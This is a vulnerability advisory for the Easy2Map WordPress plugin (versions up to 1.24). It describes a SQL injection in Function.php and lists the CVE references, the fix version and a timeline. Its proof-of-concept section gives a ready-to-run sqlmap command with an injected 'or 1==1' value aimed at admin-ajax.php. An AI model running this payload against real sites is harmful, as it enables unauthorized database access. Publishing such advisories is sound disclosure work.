Easy2Map <= 1.24 - SQL Injection



Description
The Function.php file uses sprintf() to format queries being sent to the database, this doesn't provide proper sanitisation of user input or properly parameterises the query.
Proof of Concept
$ sqlmap -u 'http://www.example.com/wp-admin/admin-ajax.php' --data="mapID=11&mapName='+or+1%3D%3D1%3B&action=e2m_img_save_map_name" --cookie=COOKIE HERE --level=5 --risk=3

Affects Plugin

fixed in version 1.2.5
- plugin closed

References

CVE 2015-4614
CVE 2015-4616
PacketStorm 132551
URL https://vapid.dhs.org/advisory.php?v=131
URL https://plugins.trac.wordpress.org/changeset/1191455/easy2map

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Larry W. Cashdollar
Submitter Twitter _larry0
Views 4288
Verified No
WPVDB ID 8075

Timeline

Publicly Published 2015-06-08 (about 5 years ago)
Added 2015-07-05 (about 5 years ago)
Last Updated 2019-10-22 (9 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin